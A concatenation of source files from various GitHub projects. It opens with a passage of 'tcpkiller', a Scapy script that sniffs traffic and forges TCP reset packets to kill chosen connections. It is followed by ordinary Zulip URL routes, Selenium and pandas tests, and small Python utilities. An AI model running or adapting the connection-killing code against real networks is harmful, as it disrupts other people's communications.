print("[*] Initialized tcpkiller on %s in %s mode, targeting %s%s. Press Ctrl-C to exit." %(self.iface, ("noisy" if self.noisy else "quiet"), (args["randomize"]), (" with verbosity enabled" if self.verbose else "")))
if self.allow:
print("[*] Allowing all connections involving " + ", ".join(self.allow))
if self.allow_src:
print("[*] Allowing all connections originating from " + ", ".join(self.allow_src))
if self.allow_dst:
print("[*] Allowing all connections coming from " + ", ".join(self.allow_dst))
if self.target:
print("[*] Targeting all connections involving " + ", ".join(self.target))
if self.target_src:
print("[*] Targeting all connections originating from " + ", ".join(self.target_src))
if self.target_dst:
print("[*] Targeting all connections coming from " + ", ".join(self.target_dst))
if self.allow_ports:
print("[*] Allowing all connections involving " + ", ".join(self.allow_ports))
if self.allow_sport:
print("[*] Allowing all connections originating from " + ", ".join(self.allow_sport))
if self.allow_dport:
print("[*] Allowing all connections coming from " + ", ".join(self.allow_dport))
if self.target_ports:
print("[*] Targeting all connections involving " + ", ".join(self.target_ports))
if self.target_sport:
print("[*] Targeting all connections originating from " + ", ".join(self.target_sport))
if self.target_dport:
print("[*] Targeting all connections coming from " + ", ".join(self.target_dport))
return True
###############################################################
# Packet Handling #
###############################################################
# Given command line arguements, method determines if this packet should be responded to
def ignore_packet(self, packet, proto):
src_ip = packet[proto].src
dst_ip = packet[proto].dst
src_port = packet[TCP].sport
dst_port = packet[TCP].dport
# Target or allow by IP
if (src_ip in self.allow or dst_ip in self.allow) or (src_ip in self.allow_src) or (dst_ip in self.allow_dst):
return True
elif (self.target and ( self.src_ip not in self.target and self.dst_ip not in self.target)) or (self.target_src and not src_ip in self.target_src) or (self.target_dst and not dst_ip in self.target_dst):
return True
# Target or allow by Port
if (src_port in self.allow_ports or dst_port in self.allow_ports) or (src_port in self.allow_sport) or (dst_port in self.allow_dport):
return True
elif (self.target_ports and (not src_port in self.target_ports and not dst_port in self.target_ports)) or (self.target_sport and not src_port in self.target_sport) or (self.target_dport and not dst_port in self.target_dport):
return True
# Target randomly
if self.randomize == "often" and randint(1, 10) < 2:
return True
elif self.randomize == "half" and randint(1, 10) < 5:
return True
elif self.randomize == "seldom" and randint(1, 10) < 8:
return True
else:
return False
###############################################################
# Scapy #
###############################################################
def send(self, packet):
self.s.send(packet)
def build_packet(self, src_mac, dst_mac, src_ip, dst_ip, src_port, dst_port, seq, proto):
eth = Ether(src=src_mac, dst=dst_mac, type=0x800)
if proto == IP:
ip = IP(src=src_ip, dst=dst_ip)
elif proto == IPv6:
ip = IPv6(src=src_ip, dst=dst_ip)
else:
return str(eth) #if unknown L2 protocol, send back dud ether packet
tcp = TCP(sport=src_port, dport=dst_port, seq=seq, flags="R")
return str(eth/ip/tcp)
def callback(self, packet):
flags = packet.sprintf("%TCP.flags%")
proto = IP
if IPv6 in packet:
proto = IPv6
if flags == "A" and not self.ignore_packet(packet, proto):
src_mac = packet[Ether].src
dst_mac = packet[Ether].dst
src_ip = packet[proto].src
dst_ip = packet[proto].dst
src_port = packet[TCP].sport
dst_port = packet[TCP].dport
seq = packet[TCP].seq
ack = packet[TCP].ack
if self.verbose:
print("RST from %s:%s (%s) --> %s:%s (%s) w/ %s" % (src_ip, src_port, src_mac, dst_ip, dst_port, dst_mac, ack))
if self.noisy:
self.send(self.build_packet(src_mac, dst_mac, src_ip, dst_ip, src_port, dst_port, seq, proto))
self.send(self.build_packet(dst_mac, src_mac, dst_ip, src_ip, dst_port, src_port, ack, proto))
def stop_cond(self, _):
return self.stop_sniffing
def launch(self):
success = self.setup()
if not success:
return
self.s.bind((self.iface, 0))
conf.sniff_promisc = True
sniff(filter='tcp', prn=self.callback, store=0, stop_filter=self.stop_cond)
| {
"content_hash": "47e812b17bd0e958f44b217a9e8078c7",
"timestamp": "",
"source": "github",
"line_count": 250,
"max_line_length": 233,
"avg_line_length": 47.556,
"alnum_prop": 0.5780132895954243,
"repo_name": "ecthros/pina-colada",
"id": "cbfce865d3f99f1b065aa4eb683b098ca596af9f",
"size": "11912",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "capabilities/dos/tcpkiller.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "2322"
},
{
"name": "HTML",
"bytes": "6877"
},
{
"name": "Python",
"bytes": "84605"
}
],
"symlink_target": ""
} |
from django.conf.urls import url
from django.conf import settings
from django.views.generic import TemplateView
import os
from django.views.static import serve
import zerver.views.registration
import zerver.views.auth
import zerver.views.email_log
# These URLs are available only in the development environment
use_prod_static = getattr(settings, 'PIPELINE_ENABLED', False)
static_root = os.path.join(settings.DEPLOY_ROOT, 'prod-static/serve' if use_prod_static else 'static')
urls = [
# Serve static assets via the Django server
url(r'^static/(?P<path>.*)$', serve, {'document_root': static_root}),
# Serve useful development environment resources (docs, coverage reports, etc.)
url(r'^coverage/(?P<path>.*)$',
serve, {'document_root':
os.path.join(settings.DEPLOY_ROOT, 'var/coverage'),
'show_indexes': True}),
url(r'^node-coverage/(?P<path>.*)$',
serve, {'document_root':
os.path.join(settings.DEPLOY_ROOT, 'var/node-coverage/lcov-report'),
'show_indexes': True}),
url(r'^casper/(?P<path>.*)$',
serve, {'document_root':
os.path.join(settings.DEPLOY_ROOT, 'var/casper'),
'show_indexes': True}),
url(r'^docs/(?P<path>.*)$',
serve, {'document_root':
os.path.join(settings.DEPLOY_ROOT, 'docs/_build/html')}),
# The special no-password login endpoint for development
url(r'^devlogin/$', zerver.views.auth.login_page,
{'template_name': 'zerver/dev_login.html'}, name='zerver.views.auth.login_page'),
# Page for testing email templates
url(r'^emails/$', zerver.views.email_log.email_page),
url(r'^emails/generate/$', zerver.views.email_log.generate_all_emails),
url(r'^emails/clear/$', zerver.views.email_log.clear_emails),
# Listing of useful URLs and various tools for development
url(r'^devtools/$', TemplateView.as_view(template_name='zerver/dev_tools.html')),
# Have easy access for error pages
url(r'^errors/404/$', TemplateView.as_view(template_name='404.html')),
url(r'^errors/5xx/$', TemplateView.as_view(template_name='500.html')),
]
i18n_urls = [
url(r'^confirmation_key/$', zerver.views.registration.confirmation_key),
]
# These are used for voyager development. On a real voyager instance,
# these files would be served by nginx.
if settings.LOCAL_UPLOADS_DIR is not None:
urls += [
url(r'^user_avatars/(?P<path>.*)$', serve,
{'document_root': os.path.join(settings.LOCAL_UPLOADS_DIR, "avatars")}),
]
| {
"content_hash": "fa2ea69339d370091f18963d68a1b359",
"timestamp": "",
"source": "github",
"line_count": 63,
"max_line_length": 102,
"avg_line_length": 40.888888888888886,
"alnum_prop": 0.65527950310559,
"repo_name": "jackrzhang/zulip",
"id": "341bf81b9d90c86d7e94f7baa515d861f1a46111",
"size": "2576",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "zproject/dev_urls.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "428151"
},
{
"name": "Emacs Lisp",
"bytes": "158"
},
{
"name": "HTML",
"bytes": "660198"
},
{
"name": "JavaScript",
"bytes": "2910049"
},
{
"name": "Pascal",
"bytes": "1113"
},
{
"name": "Perl",
"bytes": "398747"
},
{
"name": "Puppet",
"bytes": "90611"
},
{
"name": "Python",
"bytes": "6065880"
},
{
"name": "Ruby",
"bytes": "249744"
},
{
"name": "Shell",
"bytes": "112340"
},
{
"name": "TypeScript",
"bytes": "9543"
}
],
"symlink_target": ""
} |
import os
import pytest
from selenium.webdriver import FirefoxProfile
from selenium.webdriver.firefox.options import Options
@pytest.fixture(params=['capabilities', 'firefox_profile', 'firefox_options'])
def driver_kwargs(request, driver_kwargs, profile):
if request.param == 'capabilities':
options = {'profile': profile}
driver_kwargs[request.param].setdefault('moz:firefoxOptions', options)
elif request.param == 'firefox_profile':
driver_kwargs[request.param] = profile
elif request.param == 'firefox_options':
options = Options()
options.profile = profile
driver_kwargs[request.param] = options
driver_kwargs['firefox_profile'] = profile
return driver_kwargs
@pytest.fixture
def profile():
profile = FirefoxProfile()
profile.set_preference('browser.startup.homepage_override.mstone', '')
profile.set_preference('startup.homepage_welcome_url', 'about:')
profile.update_preferences()
return profile
def test_profile_is_used(driver):
assert 'about:' == driver.current_url
def test_profile_is_deleted(driver, profile):
assert os.path.exists(profile.path)
driver.quit()
assert not os.path.exists(profile.path)
| {
"content_hash": "e8bf60412b70c9284ebff2a18ae326c4",
"timestamp": "",
"source": "github",
"line_count": 40,
"max_line_length": 78,
"avg_line_length": 30.6,
"alnum_prop": 0.7099673202614379,
"repo_name": "DrMarcII/selenium",
"id": "7166ee7dcaacd68c68f471c0474e26cebed21492",
"size": "2012",
"binary": false,
"copies": "12",
"ref": "refs/heads/master",
"path": "py/test/selenium/webdriver/marionette/mn_profile_tests.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "ASP",
"bytes": "825"
},
{
"name": "Batchfile",
"bytes": "321"
},
{
"name": "C",
"bytes": "62056"
},
{
"name": "C#",
"bytes": "2761937"
},
{
"name": "C++",
"bytes": "1839569"
},
{
"name": "CSS",
"bytes": "27283"
},
{
"name": "HTML",
"bytes": "1843699"
},
{
"name": "Java",
"bytes": "4573391"
},
{
"name": "JavaScript",
"bytes": "5023504"
},
{
"name": "Makefile",
"bytes": "4655"
},
{
"name": "Objective-C",
"bytes": "4376"
},
{
"name": "Python",
"bytes": "750218"
},
{
"name": "Ragel",
"bytes": "3086"
},
{
"name": "Ruby",
"bytes": "882934"
},
{
"name": "Shell",
"bytes": "2909"
},
{
"name": "XSLT",
"bytes": "1047"
}
],
"symlink_target": ""
} |
from datetime import datetime
from enum import Enum
from math import inf
from typing import Union
class Mode(Enum):
TRAINING = 0
INFER_TRAIN = 1
INFER_VAL = 2
class Tracker:
epoch: int
n_epochs: Union[int, float]
batch: int
n_batches: int
global_batch: int
mode: Mode
start_time: datetime
best_val_accuracy: float
def __new__(cls, *args, **kwargs):
raise RuntimeError(f"{cls} should not be instantiated!")
@staticmethod
def reset(n_epochs: Union[int, float]) -> None:
Tracker.n_epochs = n_epochs
Tracker.epoch = 1
Tracker.global_batch = 1
Tracker.start_time = datetime.now()
Tracker.best_val_accuracy = -inf
@staticmethod
def progress() -> None:
mode = {
Mode.TRAINING: "Training",
Mode.INFER_TRAIN: "Inferring train set",
Mode.INFER_VAL: "Inferring validation set"
}[Tracker.mode]
batch = f"Batch {Tracker.batch} of {Tracker.n_batches}"
elapsed_time = f"Elapsed time {datetime.now() - Tracker.start_time}"
if Tracker.mode == Mode.TRAINING:
epoch = f"Epoch {Tracker.epoch} of {Tracker.n_epochs}"
global_batch = f"Global batch {Tracker.global_batch}"
message = f"{mode} | {epoch} | {batch} | {global_batch} | {elapsed_time}"
else:
epoch = f"Epoch {Tracker.epoch} of {Tracker.n_epochs}"
message = f"{mode} | {epoch} | {batch} | {elapsed_time}"
print(message)
| {
"content_hash": "8488ffb45bbe4262759a54ea84cb8f15",
"timestamp": "",
"source": "github",
"line_count": 53,
"max_line_length": 85,
"avg_line_length": 28.88679245283019,
"alnum_prop": 0.5930764206401045,
"repo_name": "googleinterns/out-of-distribution",
"id": "80c7237481e0e51f78fb0342697b66f56ea30193",
"size": "1531",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/misc/train_tracker.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Jupyter Notebook",
"bytes": "7285008"
},
{
"name": "Python",
"bytes": "149077"
},
{
"name": "Shell",
"bytes": "293"
}
],
"symlink_target": ""
} |
"""
module documentation
"""
def more(text, numlines = 15):
lines = text.splitlines()
while lines:
chunk = lines[:numlines]
lines = lines[numlines:]
for line in chunk:
print(line)
if line and input('More?') not in ['y', 'Y']:
break
if __name__ == '__main__':
import sys
more(open(sys.argv[1]).read(), 10)
| {
"content_hash": "ffaf5c8948d3e7f14c9add7a0ae1ad3c",
"timestamp": "",
"source": "github",
"line_count": 19,
"max_line_length": 53,
"avg_line_length": 20.05263157894737,
"alnum_prop": 0.5223097112860893,
"repo_name": "ordinary-developer/lin_education",
"id": "283ca79bf859bd4e3ca7b3c2d5d565aba51ae846",
"size": "381",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "books/techno/python/programming_python_4_ed_m_lutz/code/chapter_2/06_using_programs_in_two_ways/more.py",
"mode": "33188",
"license": "mit",
"language": [],
"symlink_target": ""
} |
"""
certs.py
~~~~~~~~
This module returns the preferred default CA certificate bundle.
If you are packaging Requests, e.g., for a Linux distribution or a managed
environment, you can change the definition of where() to return a separately
packaged CA bundle.
"""
import os.path
certifi = None
try:
import certifi
except ImportError:
pass
def where():
"""Return the preferred certificate bundle."""
if certifi:
return certifi.where()
return os.path.join(os.path.dirname(__file__), 'cacert.pem')
if __name__ == '__main__':
print(where())
| {
"content_hash": "e065ce162933743dc3072c498fdaa426",
"timestamp": "",
"source": "github",
"line_count": 28,
"max_line_length": 76,
"avg_line_length": 20.535714285714285,
"alnum_prop": 0.6782608695652174,
"repo_name": "mozilla/firefox-flicks",
"id": "81482767b3681dee10ec6ac45229c5c6ad722857",
"size": "622",
"binary": false,
"copies": "11",
"ref": "refs/heads/master",
"path": "vendor-local/lib/python/requests/certs.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "68358"
},
{
"name": "HTML",
"bytes": "337116"
},
{
"name": "JavaScript",
"bytes": "44816"
},
{
"name": "Puppet",
"bytes": "6653"
},
{
"name": "Python",
"bytes": "4166155"
},
{
"name": "Shell",
"bytes": "2409"
}
],
"symlink_target": ""
} |
import time
class Chrono:
"""
A utility class to compute elapsed time.
Typical usage:
c = Chrono().on()
...
print "elapsed time: %.1fs" % c.off()
"""
def __init__(self, nbDigit=1):
self.t0 = None
self.nbDigit = nbDigit
def on(self):
self.t0 = time.time()
return self
def get(self):
t = time.time()
return round(t - self.t0, self.nbDigit)
def off(self):
t = time.time()
return round(t - self.t0, self.nbDigit)
#--- obsolete interface
ltChrono = []
#Start a chronometer, you can start several of them
def chronoOn(name=None):
global ltChrono
c = Chrono().on()
ltChrono.append((c,name))
#stop the last started chronometer and returns its value in second
def chronoOff(expected_name=None):
global ltChrono
c,name = ltChrono.pop()
assert name == expected_name, (
"INTERNAL ERROR: chronoOn and chronoOff calls not properly nested."
" Got '%s' instead of '%s'. Stack is: %s") % (
name, expected_name, [_n for _,_n in ltChrono])
return c.off()
def pretty_time_delta(seconds):
seconds = int(seconds)
days, seconds = divmod(seconds, 86400)
hours, seconds = divmod(seconds, 3600)
minutes, seconds = divmod(seconds, 60)
if days > 0:
return '%dd %dh %dmin %ds' % (days, hours, minutes, seconds)
elif hours > 0:
return '%dh %dmin %ds' % (hours, minutes, seconds)
elif minutes > 0:
return '%dmin %ds' % (minutes, seconds)
else:
return '%ds' % (seconds,)
#---------- SELF-TEST --------------
if __name__ == "__main__":
print ("Selft-test")
chronoOn()
time.sleep(1)
v = chronoOff()
print (v==1, v)
chronoOn()
time.sleep(1)
chronoOn()
time.sleep(2.2)
v = chronoOff()
print ( v==2.2, v)
c = Chrono().on()
print("elapsed time: %.1fs" % c.off())
# v = chronoOff(2)
# print abs(round(v-3)) < 0.5, v
| {
"content_hash": "b159786964c4071f014fd7d78dbd2c41",
"timestamp": "",
"source": "github",
"line_count": 84,
"max_line_length": 71,
"avg_line_length": 22.80952380952381,
"alnum_prop": 0.581419624217119,
"repo_name": "Transkribus/TranskribusDU",
"id": "5113b4cb1b79723b6f7c93d4774f37a68f6fd2ad",
"size": "2022",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "TranskribusDU/common/chrono.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "2140"
},
{
"name": "HTML",
"bytes": "7987"
},
{
"name": "Python",
"bytes": "3804398"
},
{
"name": "Shell",
"bytes": "2069"
}
],
"symlink_target": ""
} |
"""Test misc module."""
import os
import shutil
from unittest import mock
import pytest
from ..misc import pass_dummy_scans, check_valid_fs_license
@pytest.mark.parametrize(
"algo_dummy_scans,dummy_scans,expected_out", [(2, 1, 1), (2, None, 2), (2, 0, 0)]
)
def test_pass_dummy_scans(algo_dummy_scans, dummy_scans, expected_out):
"""Check dummy scans passing."""
skip_vols = pass_dummy_scans(algo_dummy_scans, dummy_scans)
assert skip_vols == expected_out
@pytest.mark.parametrize(
"stdout,rc,valid",
[
(b"Successful command", 0, True),
(b"", 0, True),
(b"ERROR: FreeSurfer license file /made/up/license.txt not found", 1, False),
(b"Failed output", 1, False),
(b"ERROR: Systems running GNU glibc version greater than 2.15", 0, False),
],
)
def test_fs_license_check(stdout, rc, valid):
with mock.patch("subprocess.run") as mocked_run:
mocked_run.return_value.stdout = stdout
mocked_run.return_value.returncode = rc
assert check_valid_fs_license() is valid
@pytest.mark.skipif(not os.getenv("FS_LICENSE"), reason="No FS license found")
def test_fs_license_check2(monkeypatch):
"""Execute the canary itself."""
assert check_valid_fs_license() is True
@pytest.mark.skipif(shutil.which('mri_convert') is None, reason="FreeSurfer not installed")
def test_fs_license_check3(monkeypatch):
with monkeypatch.context() as m:
m.delenv("FS_LICENSE", raising=False)
m.delenv("FREESURFER_HOME", raising=False)
assert check_valid_fs_license() is False
| {
"content_hash": "189509050dfd9f22118d9a987658ddef",
"timestamp": "",
"source": "github",
"line_count": 48,
"max_line_length": 91,
"avg_line_length": 32.916666666666664,
"alnum_prop": 0.670253164556962,
"repo_name": "oesteban/niworkflows",
"id": "dc7d781744e60c507922c9d5a65e2e587e7d4f89",
"size": "2459",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "niworkflows/utils/tests/test_misc.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "11035"
},
{
"name": "HTML",
"bytes": "500"
},
{
"name": "Makefile",
"bytes": "413"
},
{
"name": "Python",
"bytes": "791805"
},
{
"name": "Shell",
"bytes": "1717"
},
{
"name": "Smarty",
"bytes": "5875"
}
],
"symlink_target": ""
} |
from datetime import datetime
from pandas.compat import range, lrange
import os
import operator
import nose
import numpy as np
from pandas import Series, DataFrame, Index, isnull, notnull, pivot, MultiIndex
from pandas.core.datetools import bday
from pandas.core.panel import Panel
from pandas.core.panel4d import Panel4D
from pandas.core.series import remove_na
import pandas.core.common as com
import pandas.core.panel as panelmod
from pandas import compat
from pandas.util.testing import (assert_panel_equal,
assert_panel4d_equal,
assert_frame_equal,
assert_series_equal,
assert_almost_equal)
import pandas.util.testing as tm
import pandas.compat as compat
def add_nans(panel4d):
for l, label in enumerate(panel4d.labels):
panel = panel4d[label]
tm.add_nans(panel)
class SafeForLongAndSparse(object):
_multiprocess_can_split_ = True
def test_repr(self):
foo = repr(self.panel4d)
def test_iter(self):
tm.equalContents(list(self.panel4d), self.panel4d.labels)
def test_count(self):
f = lambda s: notnull(s).sum()
self._check_stat_op('count', f, obj=self.panel4d, has_skipna=False)
def test_sum(self):
self._check_stat_op('sum', np.sum)
def test_mean(self):
self._check_stat_op('mean', np.mean)
def test_prod(self):
self._check_stat_op('prod', np.prod)
def test_median(self):
def wrapper(x):
if isnull(x).any():
return np.nan
return np.median(x)
self._check_stat_op('median', wrapper)
def test_min(self):
self._check_stat_op('min', np.min)
def test_max(self):
self._check_stat_op('max', np.max)
def test_skew(self):
try:
from scipy.stats import skew
except ImportError:
raise nose.SkipTest("no scipy.stats.skew")
def this_skew(x):
if len(x) < 3:
return np.nan
return skew(x, bias=False)
self._check_stat_op('skew', this_skew)
# def test_mad(self):
# f = lambda x: np.abs(x - x.mean()).mean()
# self._check_stat_op('mad', f)
def test_var(self):
def alt(x):
if len(x) < 2:
return np.nan
return np.var(x, ddof=1)
self._check_stat_op('var', alt)
def test_std(self):
def alt(x):
if len(x) < 2:
return np.nan
return np.std(x, ddof=1)
self._check_stat_op('std', alt)
def test_sem(self):
def alt(x):
if len(x) < 2:
return np.nan
return np.std(x, ddof=1)/np.sqrt(len(x))
self._check_stat_op('sem', alt)
# def test_skew(self):
# from scipy.stats import skew
# def alt(x):
# if len(x) < 3:
# return np.nan
# return skew(x, bias=False)
# self._check_stat_op('skew', alt)
def _check_stat_op(self, name, alternative, obj=None, has_skipna=True):
if obj is None:
obj = self.panel4d
# # set some NAs
# obj.ix[5:10] = np.nan
# obj.ix[15:20, -2:] = np.nan
f = getattr(obj, name)
if has_skipna:
def skipna_wrapper(x):
nona = remove_na(x)
if len(nona) == 0:
return np.nan
return alternative(nona)
def wrapper(x):
return alternative(np.asarray(x))
for i in range(obj.ndim):
result = f(axis=i, skipna=False)
assert_panel_equal(result, obj.apply(wrapper, axis=i))
else:
skipna_wrapper = alternative
wrapper = alternative
for i in range(obj.ndim):
result = f(axis=i)
if not tm._incompat_bottleneck_version(name):
assert_panel_equal(result, obj.apply(skipna_wrapper, axis=i))
self.assertRaises(Exception, f, axis=obj.ndim)
class SafeForSparse(object):
_multiprocess_can_split_ = True
@classmethod
def assert_panel_equal(cls, x, y):
assert_panel_equal(x, y)
@classmethod
def assert_panel4d_equal(cls, x, y):
assert_panel4d_equal(x, y)
def test_get_axis(self):
assert(self.panel4d._get_axis(0) is self.panel4d.labels)
assert(self.panel4d._get_axis(1) is self.panel4d.items)
assert(self.panel4d._get_axis(2) is self.panel4d.major_axis)
assert(self.panel4d._get_axis(3) is self.panel4d.minor_axis)
def test_set_axis(self):
new_labels = Index(np.arange(len(self.panel4d.labels)))
new_items = Index(np.arange(len(self.panel4d.items)))
new_major = Index(np.arange(len(self.panel4d.major_axis)))
new_minor = Index(np.arange(len(self.panel4d.minor_axis)))
# ensure propagate to potentially prior-cached items too
label = self.panel4d['l1']
self.panel4d.labels = new_labels
if hasattr(self.panel4d, '_item_cache'):
self.assertNotIn('l1', self.panel4d._item_cache)
self.assertIs(self.panel4d.labels, new_labels)
self.panel4d.major_axis = new_major
self.assertIs(self.panel4d[0].major_axis, new_major)
self.assertIs(self.panel4d.major_axis, new_major)
self.panel4d.minor_axis = new_minor
self.assertIs(self.panel4d[0].minor_axis, new_minor)
self.assertIs(self.panel4d.minor_axis, new_minor)
def test_get_axis_number(self):
self.assertEqual(self.panel4d._get_axis_number('labels'), 0)
self.assertEqual(self.panel4d._get_axis_number('items'), 1)
self.assertEqual(self.panel4d._get_axis_number('major'), 2)
self.assertEqual(self.panel4d._get_axis_number('minor'), 3)
def test_get_axis_name(self):
self.assertEqual(self.panel4d._get_axis_name(0), 'labels')
self.assertEqual(self.panel4d._get_axis_name(1), 'items')
self.assertEqual(self.panel4d._get_axis_name(2), 'major_axis')
self.assertEqual(self.panel4d._get_axis_name(3), 'minor_axis')
def test_arith(self):
self._test_op(self.panel4d, operator.add)
self._test_op(self.panel4d, operator.sub)
self._test_op(self.panel4d, operator.mul)
self._test_op(self.panel4d, operator.truediv)
self._test_op(self.panel4d, operator.floordiv)
self._test_op(self.panel4d, operator.pow)
self._test_op(self.panel4d, lambda x, y: y + x)
self._test_op(self.panel4d, lambda x, y: y - x)
self._test_op(self.panel4d, lambda x, y: y * x)
self._test_op(self.panel4d, lambda x, y: y / x)
self._test_op(self.panel4d, lambda x, y: y ** x)
self.assertRaises(Exception, self.panel4d.__add__, self.panel4d['l1'])
@staticmethod
def _test_op(panel4d, op):
result = op(panel4d, 1)
assert_panel_equal(result['l1'], op(panel4d['l1'], 1))
def test_keys(self):
tm.equalContents(list(self.panel4d.keys()), self.panel4d.labels)
def test_iteritems(self):
"""Test panel4d.iteritems()"""
self.assertEqual(len(list(compat.iteritems(self.panel4d))),
len(self.panel4d.labels))
def test_combinePanel4d(self):
result = self.panel4d.add(self.panel4d)
self.assert_panel4d_equal(result, self.panel4d * 2)
def test_neg(self):
self.assert_panel4d_equal(-self.panel4d, self.panel4d * -1)
def test_select(self):
p = self.panel4d
# select labels
result = p.select(lambda x: x in ('l1', 'l3'), axis='labels')
expected = p.reindex(labels=['l1', 'l3'])
self.assert_panel4d_equal(result, expected)
# select items
result = p.select(lambda x: x in ('ItemA', 'ItemC'), axis='items')
expected = p.reindex(items=['ItemA', 'ItemC'])
self.assert_panel4d_equal(result, expected)
# select major_axis
result = p.select(lambda x: x >= datetime(2000, 1, 15), axis='major')
new_major = p.major_axis[p.major_axis >= datetime(2000, 1, 15)]
expected = p.reindex(major=new_major)
self.assert_panel4d_equal(result, expected)
# select minor_axis
result = p.select(lambda x: x in ('D', 'A'), axis=3)
expected = p.reindex(minor=['A', 'D'])
self.assert_panel4d_equal(result, expected)
# corner case, empty thing
result = p.select(lambda x: x in ('foo',), axis='items')
self.assert_panel4d_equal(result, p.reindex(items=[]))
def test_get_value(self):
for item in self.panel.items:
for mjr in self.panel.major_axis[::2]:
for mnr in self.panel.minor_axis:
result = self.panel.get_value(item, mjr, mnr)
expected = self.panel[item][mnr][mjr]
assert_almost_equal(result, expected)
def test_abs(self):
result = self.panel4d.abs()
expected = np.abs(self.panel4d)
self.assert_panel4d_equal(result, expected)
p = self.panel4d['l1']
result = p.abs()
expected = np.abs(p)
assert_panel_equal(result, expected)
df = p['ItemA']
result = df.abs()
expected = np.abs(df)
assert_frame_equal(result, expected)
class CheckIndexing(object):
_multiprocess_can_split_ = True
def test_getitem(self):
self.assertRaises(Exception, self.panel4d.__getitem__, 'ItemQ')
def test_delitem_and_pop(self):
expected = self.panel4d['l2']
result = self.panel4d.pop('l2')
assert_panel_equal(expected, result)
self.assertNotIn('l2', self.panel4d.labels)
del self.panel4d['l3']
self.assertNotIn('l3', self.panel4d.labels)
self.assertRaises(Exception, self.panel4d.__delitem__, 'l3')
values = np.empty((4, 4, 4, 4))
values[0] = 0
values[1] = 1
values[2] = 2
values[3] = 3
panel4d = Panel4D(values, lrange(4), lrange(4), lrange(4), lrange(4))
# did we delete the right row?
panel4dc = panel4d.copy()
del panel4dc[0]
assert_panel_equal(panel4dc[1], panel4d[1])
assert_panel_equal(panel4dc[2], panel4d[2])
assert_panel_equal(panel4dc[3], panel4d[3])
panel4dc = panel4d.copy()
del panel4dc[1]
assert_panel_equal(panel4dc[0], panel4d[0])
assert_panel_equal(panel4dc[2], panel4d[2])
assert_panel_equal(panel4dc[3], panel4d[3])
panel4dc = panel4d.copy()
del panel4dc[2]
assert_panel_equal(panel4dc[1], panel4d[1])
assert_panel_equal(panel4dc[0], panel4d[0])
assert_panel_equal(panel4dc[3], panel4d[3])
panel4dc = panel4d.copy()
del panel4dc[3]
assert_panel_equal(panel4dc[1], panel4d[1])
assert_panel_equal(panel4dc[2], panel4d[2])
assert_panel_equal(panel4dc[0], panel4d[0])
def test_setitem(self):
## LongPanel with one item
# lp = self.panel.filter(['ItemA', 'ItemB']).to_frame()
# self.assertRaises(Exception, self.panel.__setitem__,
# 'ItemE', lp)
# Panel
p = Panel(dict(
ItemA=self.panel4d['l1']['ItemA'][2:].filter(items=['A', 'B'])))
self.panel4d['l4'] = p
self.panel4d['l5'] = p
p2 = self.panel4d['l4']
assert_panel_equal(p, p2.reindex(items=p.items,
major_axis=p.major_axis,
minor_axis=p.minor_axis))
# scalar
self.panel4d['lG'] = 1
self.panel4d['lE'] = True
self.assertEqual(self.panel4d['lG'].values.dtype, np.int64)
self.assertEqual(self.panel4d['lE'].values.dtype, np.bool_)
# object dtype
self.panel4d['lQ'] = 'foo'
self.assertEqual(self.panel4d['lQ'].values.dtype, np.object_)
# boolean dtype
self.panel4d['lP'] = self.panel4d['l1'] > 0
self.assertEqual(self.panel4d['lP'].values.dtype, np.bool_)
def test_setitem_by_indexer(self):
# Panel
panel4dc = self.panel4d.copy()
p = panel4dc.iloc[0]
def func():
self.panel4d.iloc[0] = p
self.assertRaises(NotImplementedError, func)
# DataFrame
panel4dc = self.panel4d.copy()
df = panel4dc.iloc[0,0]
df.iloc[:] = 1
panel4dc.iloc[0,0] = df
self.assertTrue((panel4dc.iloc[0,0].values == 1).all())
# Series
panel4dc = self.panel4d.copy()
s = panel4dc.iloc[0,0,:,0]
s.iloc[:] = 1
panel4dc.iloc[0,0,:,0] = s
self.assertTrue((panel4dc.iloc[0,0,:,0].values == 1).all())
# scalar
panel4dc = self.panel4d.copy()
panel4dc.iloc[0] = 1
panel4dc.iloc[1] = True
panel4dc.iloc[2] = 'foo'
self.assertTrue((panel4dc.iloc[0].values == 1).all())
self.assertTrue(panel4dc.iloc[1].values.all())
self.assertTrue((panel4dc.iloc[2].values == 'foo').all())
def test_setitem_by_indexer_mixed_type(self):
# GH 8702
self.panel4d['foo'] = 'bar'
# scalar
panel4dc = self.panel4d.copy()
panel4dc.iloc[0] = 1
panel4dc.iloc[1] = True
panel4dc.iloc[2] = 'foo'
self.assertTrue((panel4dc.iloc[0].values == 1).all())
self.assertTrue(panel4dc.iloc[1].values.all())
self.assertTrue((panel4dc.iloc[2].values == 'foo').all())
def test_comparisons(self):
p1 = tm.makePanel4D()
p2 = tm.makePanel4D()
tp = p1.reindex(labels=p1.labels + ['foo'])
p = p1[p1.labels[0]]
def test_comp(func):
result = func(p1, p2)
self.assert_numpy_array_equal(result.values,
func(p1.values, p2.values))
# versus non-indexed same objs
self.assertRaises(Exception, func, p1, tp)
# versus different objs
self.assertRaises(Exception, func, p1, p)
result3 = func(self.panel4d, 0)
self.assert_numpy_array_equal(result3.values,
func(self.panel4d.values, 0))
test_comp(operator.eq)
test_comp(operator.ne)
test_comp(operator.lt)
test_comp(operator.gt)
test_comp(operator.ge)
test_comp(operator.le)
def test_setitem_ndarray(self):
raise nose.SkipTest("skipping for now")
# from pandas import DateRange, datetools
# timeidx = DateRange(start=datetime(2009,1,1),
# end=datetime(2009,12,31),
# offset=datetools.MonthEnd())
# lons_coarse = np.linspace(-177.5, 177.5, 72)
# lats_coarse = np.linspace(-87.5, 87.5, 36)
# P = Panel(items=timeidx, major_axis=lons_coarse, minor_axis=lats_coarse)
# data = np.random.randn(72*36).reshape((72,36))
